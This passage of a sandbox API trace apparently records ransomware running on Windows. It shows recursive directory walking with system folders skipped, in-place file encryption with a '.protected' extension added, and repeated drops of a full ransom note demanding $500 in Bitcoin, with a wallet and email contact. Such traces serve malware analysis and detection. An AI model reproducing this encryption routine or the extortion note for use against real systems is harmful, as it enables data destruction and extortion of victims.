(lpString1=".", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\.") returned 102 [0086.162] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.162] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\..") returned 103 [0086.162] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.162] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.162] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Windows") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Program Files") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="Program Files (x86)") returned -1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="$Recycle.bin") returned 1 [0086.162] lstrcmpiW (lpString1="CBD4Dd01", lpString2="System Volume Information") returned -1 [0086.162] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.162] StrStrIW (lpFirst="CBD4Dd01", lpSrch=".protected") returned 0x0 [0086.162] lstrcmpW (lpString1="CBD4Dd01", lpString2="RESTORE_FILES.txt") returned -1 [0086.162] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0086.162] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0086.162] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", lpSrch=".txt") returned 0x0 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", lpSrch=".rar") returned 0x0 [0086.163] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01") returned 109 [0086.163] StrStrW (lpFirst="CBD4Dd01", lpSrch=".zip") returned 0x0 [0086.163] ReadFile (in: hFile=0x160, lpBuffer=0xcf0090, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesRead=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.168] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0xcf0090*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xcf0090*, lpNumberOfBytesWritten=0x295ddf4*=0x2800, lpOverlapped=0x0) returned 1 [0086.169] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0086.169] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0086.169] CloseHandle (hObject=0x160) returned 1 [0086.169] wnsprintfW (in: pszDest=0xcf0090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.protected") returned 119 [0086.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\CBD4Dd01.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\cbd4dd01.protected")) returned 1 [0086.170] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0086.170] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0086.170] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\RESTORE_FILES.txt") returned 118 [0086.170] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\F6\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\f6\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0086.171] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.171] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0086.172] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.172] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0086.172] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.172] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0086.172] CloseHandle (hObject=0x15c) returned 1 [0086.172] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.172] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.172] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\RESTORE_FILES.txt") returned 115 [0086.172] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.173] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.173] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.173] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.173] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.174] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.174] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.174] CloseHandle (hObject=0x158) returned 1 [0086.175] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Windows") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Program Files") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="Program Files (x86)") returned -1 [0086.175] lstrcmpiW (lpString1="2", lpString2="$Recycle.bin") returned 1 [0086.175] lstrcmpiW (lpString1="2", lpString2="System Volume Information") returned -1 [0086.175] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2") returned 97 [0086.175] lstrcmpW (lpString1="2", lpString2=".") returned 1 [0086.175] lstrcmpW (lpString1="2", lpString2="..") returned 1 [0086.175] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*") returned 99 [0086.176] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.176] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.177] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.177] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\.") returned 99 [0086.177] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.177] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.177] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.177] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\..") returned 100 [0086.177] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.177] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.177] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0086.177] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0086.177] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\RESTORE_FILES.txt") returned 115 [0086.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\2\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\2\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0086.178] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0086.178] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0086.179] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0086.179] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0086.179] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0086.179] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0086.179] CloseHandle (hObject=0x158) returned 1 [0086.179] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Windows") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Program Files") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="Program Files (x86)") returned -1 [0086.179] lstrcmpiW (lpString1="3", lpString2="$Recycle.bin") returned 1 [0086.179] lstrcmpiW (lpString1="3", lpString2="System Volume Information") returned -1 [0086.179] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned 97 [0086.179] lstrcmpW (lpString1="3", lpString2=".") returned 1 [0086.179] lstrcmpW (lpString1="3", lpString2="..") returned 1 [0086.179] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*") returned 99 [0086.179] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0086.180] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0086.180] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.180] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.180] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\.") returned 99 [0086.180] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.180] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0086.180] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.180] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\..") returned 100 [0086.181] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.181] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.181] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Windows") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Program Files") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="Program Files (x86)") returned -1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="$Recycle.bin") returned 1 [0086.181] lstrcmpiW (lpString1="4B", lpString2="System Volume Information") returned -1 [0086.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned 100 [0086.181] lstrcmpW (lpString1="4B", lpString2=".") returned 1 [0086.181] lstrcmpW (lpString1="4B", lpString2="..") returned 1 [0086.182] wnsprintfW (in: pszDest=0xce0048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*") returned 102 [0086.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0086.182] lstrcmpiW 